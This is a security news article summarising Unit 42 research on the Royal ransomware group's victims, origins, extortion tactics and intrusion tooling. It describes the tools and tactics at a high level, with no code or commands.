Ransomware, Threat Management

Royal ransomware gang quickly expands reign

The Royal ransomware group is aptly named. There’s an air of superiority in the way it taunts its victims. Royal’s members are the cream of the cybercriminal crop, and they know it.

The group’s swagger is evident in a README.txt ransom note dropped on one of its victims and obtained by Palo Alto Networks’ Unit 42.

“Most likely what happened was that you decided to save some money on your security infrastructure,” the note reads. “Alas, as a result your critical data was not only encrypted but also copied from your systems.”

Royal has become increasingly active this year, using a wide variety of tools as it aggressively targets critical infrastructure organizations.

In a post published Tuesday, Unit 42 says that according to Royal’s leak site, the group has been responsible for impacting 157 organizations since its inception last year.

“Royal ransomware has impacted a variety of industries, including small businesses and large corporations alike. Based on information from their leak site and public reporting outlets, we can see that Royal ransomware has impacted industries such as manufacturing, as well as wholesale and retail,” researchers wrote.

A focus on critical infrastructure

Over a period of a few months last year, the group boasted it impacted 14 manufacturing organizations. It has claimed to have further targeted 26 manufacturing organizations so far this year.

Royal has hit eight healthcare organizations since its inception, with the U.S. Department of Health and Human Services issuing a warning in January about the threat its ransomware posed to the healthcare sector.

There have also been seven strikes against local government entities in the U.S. and Europe, including its recent attack on the city of Dallas.

And it has impacted 14 organizations in the education sector, including school districts and universities, with four of those institutions hit in the first few days of this month alone.

Most of Royal’s victims (64%) are in the U.S., with Canadian organizations being its second most popular target (9%).

The breadth of Royal’s attacks to date “demonstrates the potential for broader and more severe consequences,” Unit 42 warns.

Operatives with years of experience

While Royal was first observed compromising systems and using multi-extortion to pressure victims in September 2022, it was linked to a previous ransomware family named Zeon, which surfaced nine months earlier.

Unit 42 researchers say it’s likely most members of Royal are former operatives of the Conti ransomware group.

“Because some of the people behind this threat were part of the development of Ryuk, which is the predecessor of Conti, they have many years of experience. This means they have a solid base for carrying out attacks and know what works when extorting victims,” according to Unit 42.

Royal has been known to demand ransoms of up to $25 million in bitcoin and the group’s tactics include leveraging its leak site to publicly extort victims into paying up.

“The Royal group will harass victims until the payment is secured, using techniques such as emailing victims and mass-printing ransom notes,” researchers said.

The group was active on Twitter until its account was suspended recently. It often used the platform to announce its compromises, tagging the victim in its posts.

“It’s not unusual to see threat actor groups create social media accounts to keep spreading their brand and announcements. It’s clear that this group is trying to get attention from multiple organizations through any means necessary,” Unit 42 says.

Unlike major ransomware groups such as LockBit 3.0, which typically operate a ransomware-as-a-service scheme, hiring affiliates and promoting their RaaS model, Unit 42 says it has not observed Royal taking that approach.

Elements of the Royal infection chain

The group has been observed using multiple initial access vectors to secure access into vulnerable systems, including callback phishing, SEO poisoning, exposed Remote Desktop Protocol accounts and compromised credentials.

Once access is secured, the group uses multiple tools to support the intrusion operation, including the TCP/UDP tunnel Chisel and the Active Directory query tool AdFind.

Royal has been observed compromising victims through a BATLOADER infection, which threat actors usually spread through SEO poisoning. BATLOADER will then attempt to download further payloads to the infected machine, such as VidarStealer, Ursnif/ISFB and Redline Stealer, along with legitimate tooling such as the system management tool NSudo and the Syncro remote monitoring and management (RMM) tool. Most importantly, BATLOADER has been seen loading Cobalt Strike, often a precursor to ransomware distribution.

Unit 42 researchers have observed Royal operators using PowerTool, a piece of software that has access to the kernel and is ideal for removing endpoint security software. The operators have also been observed executing batch scripts to disable security-related services, and deleting shadow file copies and logs after successful exfiltration.

Lateral movement through victim’s systems

Royal uses the network discovery software NetScan to identify and map out various connected computer resources such as other user targets and shares. It has also been observed using PsExec to conduct lateral movement within the infected environments.

Like other ransomware operators, it uses various popular legitimate remote management software to maintain access to the infected environment. The use of Cobalt Strike and related beacons were also observed for command-and-control.

“An interesting observation of a tool used for maintaining access was the use of Chisel, a TCP/UDP tunneling tool written in Golang,” Unit 42 says.

“[We] observed Royal threat actors using Rclone, a legitimate tool to manage files between two systems, for exfiltrating stolen data before the deployment of ransomware. We found Rclone deployed in folders such as ProgramData, or renamed and masquerading in other folders. One popular filename used was svchost.exe,” researchers wrote. As well as targeting Windows systems, Royal has expanded its arsenal by developing an ELF variant to impact Linux and ESXi environments.

Simon Hendery

Simon Hendery is a freelance IT consultant specializing in security, compliance, and enterprise workflows. With a background in technology journalism and marketing, he is a passionate storyteller who loves researching and sharing the latest industry developments.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.